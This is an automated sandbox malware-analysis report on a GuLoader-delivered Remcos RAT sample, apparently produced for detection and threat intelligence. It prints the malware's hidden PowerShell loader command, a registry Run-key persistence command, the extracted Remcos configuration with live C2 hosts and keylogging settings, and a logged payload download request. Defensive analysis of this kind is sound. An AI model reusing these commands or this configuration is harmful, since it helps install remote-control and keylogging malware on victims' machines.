Edit tour

Windows Analysis Report
zR4aIjCuRs.exe

Overview

General Information

Sample name:	zR4aIjCuRs.exe
Analysis ID:	1526565
MD5:	02f086fb54d58bf17b51564b34166f5e
SHA1:	6ad69c9bdafb1a4ca5c0d15836b3e0abdd0a1e62
SHA256:	2ac935868a1f972e5a036986147051402e1b656a5ac9ac4b8ca15252f14e15fd
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Remcos RAT

C2 URLs / IPs found in malware configuration

Found suspicious powershell code related to unpacking or dynamic code loading

Installs a global keyboard hook

Loading BitLocker PowerShell Module

Powershell drops PE file

Suspicious powershell command line found

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses dynamic DNS services

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64native

zR4aIjCuRs.exe (PID: 7948 cmdline: "C:\Users\user\Desktop\zR4aIjCuRs.exe" MD5: 02F086FB54D58BF17B51564B34166F5E)

powershell.exe (PID: 7872 cmdline: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

msiexec.exe (PID: 8020 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 6448 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

msiexec.exe (PID: 1264 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cmd.exe (PID: 7368 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

reg.exe (PID: 6020 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

WerFault.exe (PID: 4512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 2324 MD5: 40A149513D721F096DDF50C04DA2F01F)

WerFault.exe (PID: 2516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1264 -s 1068 MD5: 40A149513D721F096DDF50C04DA2F01F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "q92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTWEALTHS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-MK0QHY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000002.00000002.274416296042.000000000A9BD000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 1264	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 6020, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tragacanth

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7368, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", ProcessId: 6020, ProcessName: reg.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 85.120.16.93, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 1264, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49768

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7872, TargetFilename: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\syswow64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 1264, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Tragacanth" /t REG_EXPAND_SZ /d "%forenamed% -windowstyle 1 $Rico36=(gp -Path 'HKCU:\Software\Bistratose\').Funklet114;%forenamed% ($Rico36)", ProcessId: 7368, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) ", CommandLine: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\zR4aIjCuRs.exe", ParentImage: C:\Users\user\Desktop\zR4aIjCuRs.exe, ParentProcessId: 7948, ParentProcessName: zR4aIjCuRs.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Sudadero=Get-Content -Raw 'C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var';$Maalkastets=$Sudadero.SubString(54266,3);.$Maalkastets($Sudadero) ", ProcessId: 7872, ProcessName: powershell.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 1264, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET MALWARE Remcos 3.x Unencrypted Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T11:47:10.534594+0200	2032776	1	Malware Command and Control Activity Detected	192.168.11.20	49769	192.169.69.26	3980	TCP
2024-10-06T11:47:33.265040+0200	2032776	1	Malware Command and Control Activity Detected	192.168.11.20	49773	192.169.69.26	3980	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-06T11:47:04.196262+0200	2803270	2	Potentially Bad Traffic	192.168.11.20	49768	85.120.16.93	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "q92harbu03.duckdns.org:3980:0janbours92harbu04.duckdns.org:3981:1janbours92harbu007.duckdns.org:3981:1", "Assigned name": "MANIFESTWEALTHS", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "Rmc-MK0QHY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for domain / URL

Source: janbours92harbu04.duckdns.org	Virustotal: Detection: 6%	Perma Link
Source: janbours92harbu03.duckdns.org	Virustotal: Detection: 9%	Perma Link
Source: http://pesterbdd.com/images/Pester.png4	Virustotal: Detection: 10%	Perma Link
Source: http://pesterbdd.com/images/Pester.png	Virustotal: Detection: 9%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe	Virustotal: Detection: 69%			Perma Link

Multi AV Scanner detection for submitted file

Source: zR4aIjCuRs.exe	ReversingLabs: Detection: 79%
Source: zR4aIjCuRs.exe	Virustotal: Detection: 69%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: zR4aIjCuRs.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 85.120.16.93:443 -> 192.168.11.20:49768 version: TLS 1.2

Source: zR4aIjCuRs.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: CallSite.Targetore.pdb\|j source: powershell.exe, 00000002.00000002.274414428126.0000000008AB7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.274408791125.000000000742D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.274412829387.00000000088DF000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_004065FD FindFirstFileW,FindClose,	0_2_004065FD
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_004059CC GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059CC

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\determinationens\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49769 -> 192.169.69.26:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49773 -> 192.169.69.26:3980

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: q92harbu03.duckdns.org

Uses dynamic DNS services

Source: unknown	DNS query: name: janbours92harbu04.duckdns.org
Source: unknown	DNS query: name: janbours92harbu03.duckdns.org
Source: unknown	DNS query: name: janbours92harbu007.duckdns.org

Source: global traffic

TCP traffic: 192.168.11.20:49770 -> 45.74.58.7:3981

Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26
Source: Joe Sandbox View	IP Address: 192.169.69.26 192.169.69.26

Source: Joe Sandbox View	ASN Name: WOWUS WOWUS
Source: Joe Sandbox View	ASN Name: VOXILITYGB VOXILITYGB

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49768 -> 85.120.16.93:443

Source: global traffic

HTTP traffic detected: GET /images/vnlXriHFWaBU97.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: simonastolerciuc.roCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: simonastolerciuc.ro
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu03.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu04.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu007.duckdns.org

Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.274413700752.00000000089A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsof
Source: zR4aIjCuRs.exe, zR4aIjCuRs.exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000002.00000002.274399089002.0000000004D01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.274399089002.0000000004E57000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000002.00000002.274405286066.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.274397769175.0000000002D47000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.273838191495.0000000006A26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: msiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simonastolerciuc.ro/
Source: msiexec.exe, 00000006.00000002.274580776368.00000000069ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simonastolerciuc.ro/M
Source: msiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simonastolerciuc.ro/images/vnlXriHFWaBU97.bin
Source: msiexec.exe, 00000006.00000002.274580776368.00000000069C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binqH
Source: msiexec.exe, 00000006.00000002.274587858838.00000000224B0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://simonastolerciuc.ro/images/vnlXriHFWaBU97.binreinsEsrblog.ervadegato.com.br/vnlXriHFWaBU97.b

Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768

Source: unknown

HTTPS traffic detected: 85.120.16.93:443 -> 192.168.11.20:49768 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\SysWOW64\msiexec.exe

Windows user hook set: 0 keyboard low level C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

Code function: 0_2_00405461 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405461

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A22000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.274580776368.0000000006A11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 1264, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe

Jump to dropped file

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

Code function: 0_2_0040338F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040338F

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_00406B15	0_2_00406B15
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_004072EC	0_2_004072EC
Source: C:\Users\user\Desktop\zR4aIjCuRs.exe	Code function: 0_2_00404C9E	0_2_00404C9E
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_0305EAF0	2_2_0305EAF0
